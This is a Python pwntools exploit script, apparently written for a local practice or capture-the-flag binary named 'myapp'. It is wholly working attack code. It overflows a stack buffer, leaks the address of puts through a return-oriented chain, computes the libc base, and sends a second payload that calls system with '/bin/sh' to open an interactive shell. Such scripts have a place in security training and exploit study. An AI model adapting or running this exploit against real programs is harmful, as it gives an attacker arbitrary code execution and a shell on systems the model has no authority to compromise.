from pwn import *
# Here we define the context of the exploit, it is for linux os and amd64 archeticture
context(os='linux', arch='amd64')
put_plt_addr = p64(0x401030)
put_got_addr = p64(0x404018)
main_plt_addr = p64(0x401094)
pop_rdi_gadget = p64(0x401090)

junk = 'A'*120
payload = junk
payload += pop_rdi_gadget
payload += put_got_addr
payload += put_plt_addr
payload += main_plt_addr
#print(payload)

p = process("./myapp")
print(p.recvuntil("back?"))
#print(p.recv())
#print(p.recv())
#print(p.recv())
p.sendline(payload)
p.recvuntil("\n")
leaked = p.recv()[:8].strip().ljust(8, "\x00")
log.success("Leaked Address = " +str(leaked))

leaked = u64(leaked)

puts_libc = 0x71910
system_libc = 0x449c0
sh_libc = 0x181519
offset = leaked - puts_libc # offset between any function in the program and its address in libc
sys = p64(offset+system_libc)
sh = p64(offset+sh_libc)


payload2 = junk
payload2 += pop_rdi_gadget
payload2 += sh
payload2 += sys


p.recvuntil("back?")
p.sendline(payload2)

p.interactive()